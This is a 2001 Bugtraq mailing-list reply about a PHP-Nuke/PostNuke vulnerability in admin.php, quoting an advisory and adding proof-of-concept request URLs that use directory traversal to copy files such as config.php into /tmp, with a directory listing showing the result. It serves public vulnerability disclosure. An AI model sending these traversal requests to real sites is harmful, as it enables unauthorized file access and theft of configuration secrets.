Bugtraq mailing list archives
Re: twlc advisory: all versions of php nuke are vulnerable...
From: Paul Starzetz <paul () starzetz de>
Date: Tue, 25 Sep 2001 13:40:37 +0200
supergate () twlc net wrote:
Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files...
and even copy outside the postnuke path: http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt or for example: http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt root@somehost:/tmp > ls -la total 20 drwxrwxrwt 8 root root 2048 Sep 25 13:37 . drwxr-xr-x 19 root root 2048 Feb 28 2001 .. drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix -rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt -rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt ... Postnuke breaks with elemntary secure coding practices... /ihq
Current thread:
- twlc advisory: all versions of php nuke are vulnerable... supergate (Sep 24)
- Re: twlc advisory: all versions of php nuke are vulnerable... Magnus Skjegstad (Sep 24)
- Re: twlc advisory: all versions of php nuke are vulnerable... Paul Starzetz (Sep 25)
- <Possible follow-ups>
- Re: twlc advisory: all versions of php nuke are vulnerable... Magnus Skjegstad (Sep 25)